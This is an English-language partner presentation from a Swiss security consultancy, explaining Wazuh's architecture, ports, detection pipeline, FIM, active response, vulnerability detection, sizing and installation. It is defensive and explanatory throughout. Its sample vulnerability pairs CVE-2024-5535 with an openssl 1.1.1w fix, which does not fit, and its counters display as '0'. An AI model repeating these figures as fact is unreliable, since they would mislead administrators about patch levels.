CYBER SECURITY · BUCHS SG
WAZUH · TECHNISCHE EINFÜHRUNG
WAZUH / ARCHITECTURE & COMPONENTS

An open-source XDR & SIEM, explained for the people who will actually deploy it.

A walk-through of the Wazuh stack — agents, server, indexer, dashboard — and where it sits inside a Blue-Team Operations stack. Built for integration partners.
Den Angreifern einen Schritt voraus.

Agent
endpoint
Server
analysis
Indexer
storage
Dashboard
UI / API
MAY 2026 · IVAN STRICKER · T-ALPHA GMBH
scroll
01 Introduction

What is Wazuh?

A free, open-source unified XDR + SIEM platform. Wazuh consolidates host-based intrusion detection, log management, file integrity monitoring, vulnerability detection, configuration assessment and active response — into a single agent and central analytics plane. No per-EPS or per-GB licensing.

0
CORE COMPONENTS
Agent · Server · Indexer · Dashboard
0
DETECTION RULES
Built-in, MITRE ATT&CK mapped
0
PLATFORMS
Linux · Windows · macOS · AIX · Solaris · HP-UX · Docker · K8s · AWS · Azure · GCP
0€
LICENSING
No per-EPS or per-GB charges. Open source, Apache 2.0.
SOURCE
wazuh.com — official documentation
02 Blue-Team Operations Stack

Wazuh as the central XDR/SIEM in an open-source stack

Wazuh sits at the centre. Suricata feeds it network events; TheHive orchestrates incidents that come out of it; Cortex analyses observables; MISP shares IOCs back upstream. Hover a node to trace its connections.

Suricata Wazuh TheHive Cortex MISP
03 Architecture

Four core components, one continuous data flow

A packet of telemetry travels from endpoint to operator screen in five hops. Click any step to focus the flow.

Wazuh Agent
Endpoint collection
TCP 1514 · AES-256
Wazuh Server
Decode + rules
Filebeat · TLS · TCP 9200
Wazuh Indexer
Storage + search
REST · TCP 55000
Dashboard
Visualisation + API
  1. 01
    Agent collects logs, FIM events and host telemetry on the endpoint.
  2. 02
    Encrypted upload to the server over TCP 1514 (AES-256, blowfish optional).
  3. 03
    Server decodes, applies the ruleset and raises alerts (severity 0–15).
  4. 04
    Filebeat ships alerts to the Indexer over TLS (TCP 9200).
  5. 05
    Dashboard renders data and drives the platform via REST API (TCP 55000).
04 Wazuh Server (Manager)

Central element — analyses every event and triggers alerts

01

Agent Registration

Enrols new agents and distributes authentication keys.

authd · TCP 1515
02

Agent Connection

Receives data and validates identity.

TCP 1514
03

Analysis Engine

Decoders + rules drive event identification and processing.

analysisd
04

RESTful API

Programmatic interface to the Wazuh control plane.

TCP 55000
05

Cluster Daemon

Horizontal scaling in multi-node configurations.

TCP 1516
06

Filebeat + Threat Intel

Forwards events to the Indexer and matches IOCs against intel feeds.

filebeat · IOC match
05 Indexer & Dashboard

Storage, search and the operator interface

INDEXER
OpenSearch · 9200/TCP
  • Stores all alerts and events from the server
  • Real-time full-text search over security data
  • RESTful API on TCP 9200
  • Cluster transport on TCP 9300–9400
  • Horizontally scalable (multi-node)
DASHBOARD
HTTPS · 443/TCP
  • Visualization — built-in dashboards: PCI DSS, GDPR, CIS, HIPAA, NIST 800-53
  • Agent management — monitor, configure and upgrade agents
  • Developer tooling — ruleset test, API console, custom views
06 Agents & Modules

Cross-platform agents, eight built-in modules

Linux · Windows · macOS · Solaris · AIX · HP-UX. Plus container and cloud collectors. Agentless monitoring is supported via Syslog, SSH or API integration for appliances and unsupported OS targets.

Log Collector

OS and application logs.

FIM

File integrity monitoring.

Rootcheck

Rootkit & anomaly detection.

SCA

Configuration assessment.

Syscollector

Hardware / software inventory.

Active Response

Automated countermeasures.

Docker / K8s

Container security.

Cloud Modules

AWS · Azure · GCP.

Agent Grouping Model — how configuration is layered

DEFAULT
Baseline configuration applied to every agent enrolled in the manager.
GROUP
Logical sets — linux-prod, windows-dc, dmz. One agent can belong to many groups.
AGENT-SPECIFIC
Per-host overrides. Used sparingly to keep config maintainable.
PRACTICAL RULE
Prefer groups. They give you targeted configuration without per-host drift, and they make rollbacks straightforward.
INSIDE THE ENGINE

Detection mechanics

Log analysis pipeline, decoders, rules, FIM, Active Response, Vulnerability Detection and SCA — the building blocks your team will work with day-to-day.

07 Log Analysis Pipeline

From raw event to enriched, MITRE-mapped alert

  1. 01
    Collect
    Log Collector ingests raw data — syslog, Windows Event Log, application logs.
  2. 02
    Pre-decode
    Extracts standard fields: timestamp, hostname, program name.
  3. 03
    Decode
    Regex breaks the event into structured fields — srcip, user, action.
  4. 04
    Rule match
    Engine matches decoded fields against 4,000+ rules (Wazuh + custom).
  5. 05
    Alert
    Severity 0–15, MITRE ATT&CK mapping, structured payload to Indexer.
demo · SSH brute-force detection
in sshd[1234]: Failed password for root from 192.168.1.50 port 22
decoder: sshd
rule 5763 (level 10): multiple authentication failures
MITRE: T1110 Brute Force
! ALERT raised · forwarded to Indexer · severity 10
TIP
Severity ≥ 7 typically goes to the SOC; ≥ 12 wakes someone up.
08 Custom Decoders & Rules

How partners typically extend Wazuh for client-specific applications

DECODER local_decoder.xml 
<decoder name="myapp">
  <program_name>myapp</program_name>
  <regex>User (\S+) logged in from (\S+)</regex>
  <order>user, srcip</order>
</decoder>
RULE local_rules.xml 
<rule id="100001" level="5">
  <decoded_as>myapp</decoded_as>
  <description>User Login via myapp</description>
  <group>authentication_success,</group>
</rule>
VALIDATE INTERACTIVELY wazuh-logtest 
$ /var/ossec/bin/wazuh-logtest
> myapp: User admin logged in from 10.0.0.5
 decoder: myapp | rule 100001 (level 5): User Login via myapp
Decoders extract structured fields from raw logs
Rules define conditions and severity
wazuh-logtest validates without restart
09 File Integrity Monitoring

Detect tampering, web-shells and unauthorised changes

How FIM works

  • Baseline scan computes SHA-256 hashes of monitored files.
  • Periodic or real-time scans detect changes.
  • Compares: content, permissions, owner, size.
  • On change: alert with diff and affected file path.
CONFIG ossec.conf 
<syscheck>
  <frequency>600</frequency>
  <directories realtime="yes">/etc,/usr/bin</directories>
  <directories>/var/www/html</directories>
</syscheck>
REAL-WORLD EXAMPLE web-shell detection
  1. 01
    Attacker drops /var/www/html/backdoor.php
  2. 02
    FIM detects new file in real-time and raises rule 554 (level 7)
  3. 03
    Alert carries SHA-256 hash, owner, timestamp and full path
  4. 04
    SOC isolates the file immediately — no waiting for the next scan window
level 7 · rule 554 · 9f1a…d0c4 · /var/www/html/backdoor.php
10 Active Response

Automated containment on the affected endpoint

  1. 01Event
  2. 02Decode
  3. 03Rule match
  4. 04AR trigger
  5. 05Action
CAPABILITIES
  • Built-in scripts: firewall-drop, host-deny, disable-account
  • Custom scripts supported (Bash, Python, PowerShell)
  • Configurable: timeout, specific rules, local vs server-side execution
  • Self-undoing — IP blocks lift automatically when the timeout expires
EXAMPLE — FIREWALL-DROP
ossec.conf
<active-response>
  <command>firewall-drop</command>
  <location>local</location>
  <rules_id>5763</rules_id>     <!-- SSH brute force -->
  <timeout>600</timeout>          <!-- 10-min block -->
</active-response>
11 Vulnerability Detection

Agent-based — no separate network scanner required

  1. 01
    Syscollector
    inventory packages, OS, kernel
  2. 02
    CVE match
    NVD · Canonical · Red Hat · Microsoft
  3. 03
    Alert
    CVE id, CVSS score, fix version
REPORTED
openssl 1.1.1k installed on web-prod-04
DETECTED
CVE-2024-5535 · CVSS 9.1 · alert level 13
REMEDIATE
Upgrade to openssl 1.1.1w or later
12 Security Configuration Assessment

Automated checks against hardening benchmarks

CIS-aligned

Built on CIS Benchmarks plus your own policies (YAML).

Local execution

Agent runs the checks locally and reports pass/fail to the server.

1,000+ checks

Pre-built checks for Linux, Windows and macOS.

Compliance mapping

PCI DSS · HIPAA · NIST 800-53 · GDPR.

CIS BENCHMARK Ubuntu 22.04 LTS
82% pass
11% fail
7% n/a
Failed checks include → disable IPv4 redirects audit log permissions password reuse policy
13 Communication & Ports

All inter-component traffic is encrypted (AES-256 / TLS)

Source
Destination
Port
Protocol
Purpose
Agent
Manager
1514/TCP
AES-256
Event ingestion (default)
Agent
Manager
1515/TCP
TLS
Agent enrollment / authd
Manager
Manager
1516/TCP
AES-256
Cluster daemon
Manager
Indexer
9200/TCP
TLS
Filebeat alert ingest
Indexer
Indexer
9300–9400
TLS
Cluster transport
Dashboard
Manager
55000/TCP
TLS
REST API (control plane)
User
Dashboard
443/TCP
HTTPS
Web interface
RULE OF THUMB
Open only what's needed per direction. Place the dashboard behind your reverse proxy or VPN — never expose 55000 to the internet.
14 Deployment & Hardware

Pick the model that fits the customer's scale

01

All-in-One

All components on one server. Lab and small environments.

02

Distributed

Components on dedicated servers. Flexibility and scale.

03

Docker / Kubernetes

Container-based deployment. Cattle, not pets.

04

Wazuh Cloud (SaaS)

Managed service. No infrastructure of your own.

All-in-One sizing — 90-day retention

Agents
EPS
CPU
RAM
Storage (90 d)
≤ 25
100
4 vCPU
8 GB
50 GB
≤ 100
500
8 vCPU
16 GB
200 GB
≤ 500
2,500
16 vCPU
32 GB
1 TB
≤ 1,000
5,000
16+ vCPU
64 GB
2 TB → distribute
15 Installation

All-in-one in three commands

Partner-grade installs need more, but this is the fastest path to a working environment.

ALL-IN-ONE INSTALLER ubuntu / debian 
$ sudo apt update && sudo apt upgrade -y
$ curl -sO https://packages.wazuh.com/4.12/wazuh-install.sh
$ sudo bash ./wazuh-install.sh -a

Configuration paths

  • /var/ossec/etc/ossec.confmain XML
  • /var/ossec/etc/rules/rules
  • /var/ossec/etc/decoders/decoders

Identical structure on Manager + Agent.

After installation

  • Dashboard at https://<IP>:443
  • Login: admin + generated password
  • Save wazuh-install-files.tar in your vault
  • Set the timezone (timedatectl set-timezone)

Agent deployment (Linux)

$ curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH \
    | gpg --import
$ apt install wazuh-agent

Use deployment variables to auto-enrol.

16 Summary

What to take away

  1. 01
    Wazuh — free, open-source XDR + SIEM platform.
  2. 02
    Four core components: Agent · Server · Indexer · Dashboard.
  3. 03
    Analysis pipeline: Decoder → Rules → Alerts (4,000+ rules out of the box).
  4. 04
    Modules: FIM, Active Response, Vulnerability Detection, SCA, Cloud, Containers.
  5. 05
    Encrypted communication (AES-256 / TLS) on every link.
  6. 06
    Compliance built in: PCI DSS, GDPR, HIPAA, NIST 800-53, CIS.
WHO YOU'RE WORKING WITH

Den Angreifern einen Schritt voraus.

Independent, owner-led Swiss cybersecurity practice based in Buchs SG. Open-source first. Hands-on Blue Team and Red Team work — no vendor lock-in, no management overhead. Wir verkaufen keine Hardware und keine Software — die Ergebnisse sind absolut neutral.

BLUE TEAM
Wazuh deployments, custom decoders & rules, SIEM operations
RED TEAM
Penetration tests, vulnerability assessments, security checks
CONSULTING
Security concepts, awareness trainings, automation-first
FOUNDERS
David Dutler
CEO & CO-FOUNDER
Ivan Stricker
CTO & CO-FOUNDER
NEXT STEPS
  • Walk through a live Wazuh environment together
  • Pick one customer scenario to model end-to-end
  • Define what each side brings — tooling, support, escalation